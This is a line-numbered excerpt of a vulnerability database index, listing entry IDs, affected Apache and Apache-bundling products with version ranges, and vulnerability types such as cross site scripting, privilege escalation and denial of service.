13029| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
13030| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
13031| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
13032| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
13033| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
13034| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
13035| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
13036| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
13037| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
13038| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
13039| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
13040| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
13041| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
13042| [103690] Apache OpenMeetings 1.0.0 sql injection
13043| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
13044| [103688] Apache OpenMeetings 1.0.0 weak encryption
13045| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
13046| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
13047| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
13048| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
13049| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
13050| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
13051| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
13052| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
13053| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
13054| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
13055| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
13056| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
13057| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
13058| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
13059| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
13060| [103352] Apache Solr Node weak authentication
13061| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
13062| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
13063| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
13064| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
13065| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
13066| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
13067| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
13068| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
13069| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
13070| [102536] Apache Ranger up to 0.6 Stored cross site scripting
13071| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
13072| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
13073| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
13074| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
13075| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
13076| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
13077| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
13078| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
13079| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
13080| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
13081| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
13082| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
13083| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
13084| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
13085| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
13086| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
13087| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
13088| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
13089| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
13090| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
13091| [99937] Apache Batik up to 1.8 privilege escalation
13092| [99936] Apache FOP up to 2.1 privilege escalation
13093| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
13094| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
13095| [99930] Apache Traffic Server up to 6.2.0 denial of service
13096| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
13097| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
13098| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
13099| [117569] Apache Hadoop up to 2.7.3 privilege escalation
13100| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
13101| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
13102| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
13103| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
13104| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
13105| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
13106| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
13107| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
13108| [99014] Apache Camel Jackson/JacksonXML privilege escalation
13109| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
13110| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
13111| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
13112| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
13113| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
13114| [98605] Apple macOS up to 10.12.3 Apache denial of service
13115| [98604] Apple macOS up to 10.12.3 Apache denial of service
13116| [98603] Apple macOS up to 10.12.3 Apache denial of service
13117| [98602] Apple macOS up to 10.12.3 Apache denial of service
13118| [98601] Apple macOS up to 10.12.3 Apache denial of service
13119| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
13120| [98405] Apache Hadoop up to 0.23.10 privilege escalation
13121| [98199] Apache Camel Validation XML External Entity
13122| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
13123| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
13124| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
13125| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
13126| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
13127| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
13128| [97081] Apache Tomcat HTTPS Request denial of service
13129| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
13130| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
13131| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
13132| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
13133| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
13134| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
13135| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
13136| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
13137| [95311] Apache Storm UI Daemon privilege escalation
13138| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
13139| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
13140| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
13141| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
13142| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
13143| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
13144| [94540] Apache Tika 1.9 tika-server File information disclosure
13145| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
13146| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
13147| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
13148| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
13149| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
13150| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
13151| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
13152| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
13153| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
13154| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
13155| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
13156| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
13157| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
13158| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
13159| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
13160| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
13161| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
13162| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
13163| [93532] Apache Commons Collections Library Java privilege escalation
13164| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
13165| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
13166| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
13167| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
13168| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
13169| [93098] Apache Commons FileUpload privilege escalation
13170| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
13171| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
13172| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
13173| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
13174| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
13175| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
13176| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
13177| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
13178| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
13179| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
13180| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
13181| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
13182| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
13183| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
13184| [92549] Apache Tomcat on Red Hat privilege escalation
13185| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
13186| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
13187| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
13188| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
13189| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
13190| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
13191| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
13192| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
13193| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
13194| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
13195| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
13196| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
13197| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
13198| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
13199| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
13200| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
13201| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
13202| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
13203| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
13204| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
13205| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
13206| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
13207| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
13208| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
13209| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
13210| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
13211| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
13212| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
13213| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
13214| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
13215| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
13216| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
13217| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
13218| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
13219| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
13220| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
13221| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
13222| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
13223| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
13224| [90263] Apache Archiva Header denial of service
13225| [90262] Apache Archiva Deserialize privilege escalation
13226| [90261] Apache Archiva XML DTD Connection privilege escalation
13227| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
13228| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
13229| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
13230| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
13231| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
13232| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
13233| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
13234| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
13235| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
13236| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
13237| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
13238| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
13239| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
13240| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
13241| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
13242| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
13243| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
13244| [87765] Apache James Server 2.3.2 Command privilege escalation
13245| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
13246| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
13247| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
13248| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
13249| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
13250| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
13251| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
13252| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
13253| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
13254| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
13255| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
13256| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
13257| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
13258| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
13259| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
13260| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
13261| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
13262| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
13263| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
13264| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
13265| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
13266| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
13267| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
13268| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
13269| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
13270| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
13271| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
13272| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
13273| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
13274| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
13275| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
13276| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
13277| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
13278| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
13279| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
13280| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
13281| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
13282| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
13283| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
13284| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
13285| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
13286| [82076] Apache Ranger up to 0.5.1 privilege escalation
13287| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
13288| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
13289| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
13290| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
13291| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
13292| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
13293| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
13294| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
13295| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
13296| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
13297| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
13298| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
13299| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
13300| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
13301| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
13302| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
13303| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
13304| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
13305| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
13306| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
13307| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
13308| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
13309| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
13310| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
13311| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
13312| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
13313| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
13314| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
13315| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
13316| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
13317| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
13318| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
13319| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
13320| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
13321| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
13322| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
13323| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
13324| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
13325| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
13326| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
13327| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
13328| [79791] Cisco Products Apache Commons Collections Library privilege escalation
13329| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
13330| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
13331| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
13332| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
13333| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
13334| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
13335| [78989] Apache Ambari up to 2.1.1 Open Redirect
13336| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
13337| [78987] Apache Ambari up to 2.0.x cross site scripting
13338| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
13339| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
13340| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
13341| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
13342| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
13343| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
13344| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
13345| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
13346| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
13347| [77406] Apache Flex BlazeDS AMF Message XML External Entity
13348| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
13349| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
13350| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
13351| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
13352| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
13353| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
13354| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
13355| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
13356| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
13357| [76567] Apache Struts 2.3.20 unknown vulnerability
13358| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
13359| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
13360| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
13361| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
13362| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
13363| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
13364| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
13365| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
13366| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
13367| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
13368| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
13369| [74793] Apache Tomcat File Upload denial of service
13370| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
13371| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
13372| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
13373| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
13374| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
13375| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
13376| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
13377| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
13378| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
13379| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
13380| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
13381| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
13382| [74468] Apache Batik up to 1.6 denial of service
13383| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
13384| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
13385| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
13386| [74174] Apache WSS4J up to 2.0.0 privilege escalation
13387| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
13388| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
